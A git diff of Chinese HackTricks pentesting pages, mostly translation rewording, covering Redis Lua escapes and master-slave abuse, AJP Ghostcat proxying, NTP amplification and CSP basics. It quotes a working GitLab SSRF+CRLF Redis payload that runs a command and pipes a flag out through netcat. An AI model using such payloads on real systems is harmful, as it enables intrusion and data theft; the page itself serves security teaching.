代码沙箱**。在链接的帖子中,你可以看到 **如何滥用它** 使用 **dofile** 函数,但 [显然](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) 这已经不再可能。无论如何,如果你能 **绕过 Lua** 沙箱,你可以 **在系统上执行任意** 命令。此外,从同一帖子中你可以看到一些 **导致 DoS 的选项**。 -一些 **CVE 用于逃离 LUA**: +一些 **CVE 用于逃避 LUA**: * [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543) -### 主从模块 +### Master-Slave Module -主 Redis 的所有操作会自动同步到从 Redis,这意味着我们可以将漏洞 Redis 视为从 Redis,连接到我们自己控制的主 Redis,然后我们可以向自己的 Redis 输入命令。 +​主 Redis 的所有操作会自动同步到从 Redis,这意味着我们可以将漏洞 Redis 视为一个从 Redis,连接到我们自己控制的主 Redis,然后我们可以向我们自己的 Redis 输入命令。 ``` master redis : 10.85.0.51 (Hacker's Server) slave redis : 10.85.0.52 (Target Vulnerability Server) @@ -296,7 +296,7 @@ set mykey2 helloworld ### 示例:Gitlab SSRF + CRLF 到 Shell -在 **Gitlab11.4.7** 中发现了一个 **SSRF** 漏洞和一个 **CRLF**。该 **SSRF** 漏洞存在于 **从 URL 导入项目功能** 中,在创建新项目时允许以 \[0:0:0:0:0:ffff:127.0.0.1] 的形式访问任意 IP(这将访问 127.0.0.1),而 **CRLF** 漏洞则通过在 **URL** 中添加 **%0D%0A** 字符来利用。 +在 **Gitlab11.4.7** 中发现了一个 **SSRF** 漏洞和一个 **CRLF**。该 **SSRF** 漏洞存在于 **从 URL 导入项目功能** 中,在创建新项目时允许以 \[0:0:0:0:0:ffff:127.0.0.1] 的形式访问任意 IP(这将访问 127.0.0.1),而 **CRLF** 漏洞则是通过向 **URL** 添加 **%0D%0A** 字符来利用的。 因此,可以 **利用这些漏洞与管理来自 gitlab 的队列的 Redis 实例进行通信**,并利用这些队列 **获得代码执行**。Redis 队列滥用有效载荷是: ``` @@ -309,13 +309,13 @@ exec ``` git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` -_出于某种原因(正如_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _的作者所述)利用`git`方案而不是`http`方案成功。_ +_出于某种原因(正如_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _中作者所述)_,_利用`git`方案而不是`http`方案成功。_ -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! -**黑客见解**\ +**黑客洞察**\ 参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ @@ -324,7 +324,7 @@ _出于某种原因(正如_ [_https://liveoverflow.com/gitlab-11-4-7-remote-co **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作! +**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! {% hint style="success" %} 学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ @@ -335,8 +335,8 @@ _出于某种原因(正如_ [_https://liveoverflow.com/gitlab-11-4-7-remote-co 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 {% endhint %} diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index e94a7ea00..cd048bc45 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -15,7 +15,7 @@ {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,15 +28,15 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们,进入** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! ## 基本信息 来自: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) -> AJP 是一种线协议。它是 HTTP 协议的优化版本,允许独立的 web 服务器如 [Apache](http://httpd.apache.org/) 与 Tomcat 通信。历史上,Apache 在提供静态内容方面比 Tomcat 快得多。其想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 以获取与 Tomcat 相关的内容。 +> AJP 是一种线协议。它是 HTTP 协议的优化版本,允许独立的 web 服务器如 [Apache](http://httpd.apache.org/) 与 Tomcat 通信。从历史上看,Apache 在提供静态内容方面比 Tomcat 快得多。其想法是让 Apache 在可能的情况下提供静态内容,但将请求代理到 Tomcat 以获取与 Tomcat 相关的内容。 -也很有趣: +同样有趣的是: > ajp13 协议是面向数据包的。出于性能原因,显然选择了二进制格式而不是更易读的纯文本。web 服务器通过 TCP 连接与 servlet 容器通信。为了减少创建套接字的昂贵过程,web 服务器将尝试保持与 servlet 容器的持久 TCP 连接,并重用一个连接进行多个请求/响应周期。 @@ -49,7 +49,7 @@ PORT STATE SERVICE 如果 AJP 端口暴露,Tomcat 可能会受到 Ghostcat 漏洞的影响。这里有一个 [exploit](https://www.exploit-db.com/exploits/48143) 可以利用这个问题。 -Ghostcat 是一个 LFI 漏洞,但有些限制:只能提取来自特定路径的文件。尽管如此,这仍然可以包括像 `WEB-INF/web.xml` 这样的文件,这可能会泄露重要信息,如 Tomcat 接口的凭据,具体取决于服务器设置。 +Ghostcat 是一个 LFI 漏洞,但有些限制:只能提取来自特定路径的文件。尽管如此,这仍然可能包括像 `WEB-INF/web.xml` 这样的文件,这可能会泄露重要信息,如 Tomcat 界面的凭据,具体取决于服务器的设置。 在 9.0.31、8.5.51 和 7.0.100 或更高版本中已修复此问题。 @@ -67,7 +67,7 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 [查看 Docker 化版本](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version) -当我们遇到一个开放的 AJP 代理端口(8009 TCP)时,我们可以使用带有 `ajp_module` 的 Nginx 访问“隐藏”的 Tomcat 管理员。这可以通过编译 Nginx 源代码并添加所需模块来完成,如下所示: +当我们遇到一个开放的 AJP 代理端口 (8009 TCP) 时,我们可以使用带有 `ajp_module` 的 Nginx 访问“隐藏”的 Tomcat 管理员。这可以通过编译 Nginx 源代码并添加所需模块来完成,如下所示: * 下载 Nginx 源代码 * 下载所需模块 @@ -87,7 +87,7 @@ make sudo make install nginx -V ``` -在`/etc/nginx/conf/nginx.conf`的`http`块中注释掉整个`server`块,并在其中添加以下行。 +将整个 `server` 块注释掉,并在 `/etc/nginx/conf/nginx.conf` 的 `http` 块中附加以下行。 ```shell-session upstream tomcats { server :8009; @@ -101,7 +101,7 @@ ajp_pass tomcats; } } ``` -启动 Nginx,并通过向本地主机发出 cURL 请求来检查一切是否正常工作。 +启动 Nginx 并通过向本地主机发出 cURL 请求来检查一切是否正常工作。 ```html sudo nginx curl http://127.0.0.1:80 @@ -165,7 +165,7 @@ sudo a2enmod proxy_http sudo a2enmod proxy_ajp sudo systemctl restart apache2 ``` -此设置提供了绕过入侵检测和防御系统(IDS/IPS)的潜力,原因在于**AJP协议的二进制特性**,尽管这一能力尚未得到验证。通过将常规的Metasploit Tomcat漏洞利用指向`127.0.0.1:80`,您可以有效地控制目标系统。 +此设置由于**AJP协议的二进制特性**,提供了绕过入侵检测和防御系统(IDS/IPS)的潜力,尽管这一能力尚未得到验证。通过将常规的Metasploit Tomcat漏洞利用指向`127.0.0.1:80`,您可以有效地控制目标系统。 ```bash msf exploit(tomcat_mgr_deploy) > show options ``` @@ -174,7 +174,7 @@ msf exploit(tomcat_mgr_deploy) > show options * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295) -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -191,14 +191,14 @@ msf exploit(tomcat_mgr_deploy) > show options {% hint style="success" %} 学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习与实践 GCP 黑客技术: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。** +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index 974fe9176..86a63df50 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -9,14 +9,14 @@ 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 {% endhint %} {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -33,7 +33,7 @@ ## 基本信息 -**网络时间协议 (NTP)** 确保计算机和网络设备在可变延迟网络中准确同步时钟。它对于维护 IT 操作、安全性和日志记录中的精确计时至关重要。NTP 的准确性至关重要,但如果管理不当,也会带来安全风险。 +**网络时间协议 (NTP)** 确保计算机和网络设备在可变延迟网络中准确同步时钟。它对 IT 操作、安全和日志记录中的精确计时至关重要。NTP 的准确性至关重要,但如果管理不当,也会带来安全风险。 ### 摘要与安全提示: @@ -71,7 +71,7 @@ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 1 [**NTP DDoS攻击的工作原理**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) -**NTP协议**使用UDP,允许在不需要握手程序的情况下操作,这与TCP不同。这个特性在**NTP DDoS放大攻击**中被利用。在这里,攻击者创建带有假源IP的包,使攻击请求看起来像是来自受害者。这些最初较小的包促使NTP服务器以更大的数据量进行响应,从而放大攻击。 +**NTP协议**使用UDP,允许在没有握手程序的情况下操作,这与TCP不同。这个特性在**NTP DDoS放大攻击**中被利用。在这里,攻击者创建带有假源IP的包,使攻击请求看起来像是来自受害者。这些最初较小的包促使NTP服务器以更大的数据量进行响应,从而放大攻击。 尽管_**MONLIST**_命令使用较少,但可以报告最后600个连接到NTP服务的客户端。虽然该命令本身很简单,但在此类攻击中的误用突显了关键的安全漏洞。 ```bash @@ -100,7 +100,7 @@ Name: Nmap Description: Enumerate NTP Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} ``` -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -113,7 +113,7 @@ Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or bru **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),开始与顶级黑客合作吧! +**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! {% hint style="success" %} 学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ 学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) @@ -123,8 +123,8 @@ Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or bru 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 {% endhint %} diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index d836bbfb9..77ca70209 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -9,13 +9,13 @@ 支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。 +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。 {% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! @@ -28,11 +28,11 @@ **最新公告**\ 了解最新的漏洞赏金计划和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧! ## 什么是 CSP -内容安全策略 (CSP) 被认为是一种浏览器技术,主要旨在 **防御诸如跨站脚本 (XSS) 的攻击**。它通过定义和详细说明资源可以安全加载的路径和来源来运作。这些资源包括图像、框架和 JavaScript 等多种元素。例如,策略可能允许从同一域 (self) 加载和执行资源,包括内联资源以及通过 `eval`、`setTimeout` 或 `setInterval` 等函数执行字符串代码。 +内容安全策略 (CSP) 被认为是一种浏览器技术,主要旨在 **防御诸如跨站脚本 (XSS) 的攻击**。它通过定义和详细说明浏览器可以安全加载资源的路径和来源来发挥作用。这些资源包括图像、框架和 JavaScript 等多种元素。例如,策略可能允许从同一域 (self) 加载和执行资源,包括内联资源以及通过 `eval`、`setTimeout` 或 `setInterval` 等函数执行字符串代码。 CSP 的实施通过 **响应头** 或通过将 **meta 元素嵌入 HTML 页面** 来进行。遵循此政策后,浏览器会主动执行这些规定,并立即阻止任何检测到的违规行为。 @@ -46,9 +46,9 @@ Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; ``` ### Headers -CSP 可以通过以下头部进行强制执行或监控: +CSP 可以使用以下头部进行强制或监控: -* `Content-Security-Policy`: 强制执行 CSP;浏览器会阻止任何违规行为。 +* `Content-Security-Policy`: 强制执行 CSP;浏览器阻止任何违规行为。 * `Content-Security-Policy-Report-Only`: 用于监控;报告违规行为而不阻止它们。非常适合在预生产环境中进行测试。 ### Defining Resources @@ -70,11 +70,11 @@ object-src 'none'; * **script-src**: 允许特定来源的JavaScript,包括URL、内联脚本和由事件处理程序或XSLT样式表触发的脚本。 * **default-src**: 设置在缺少特定获取指令时获取资源的默认策略。 * **child-src**: 指定允许的Web工作者和嵌入框架内容的资源。 -* **connect-src**: 限制可以通过fetch、WebSocket、XMLHttpRequest等接口加载的URL。 +* **connect-src**: 限制可以使用fetch、WebSocket、XMLHttpRequest等接口加载的URL。 * **frame-src**: 限制框架的URL。 * **frame-ancestors**: 指定可以嵌入当前页面的来源,适用于``、`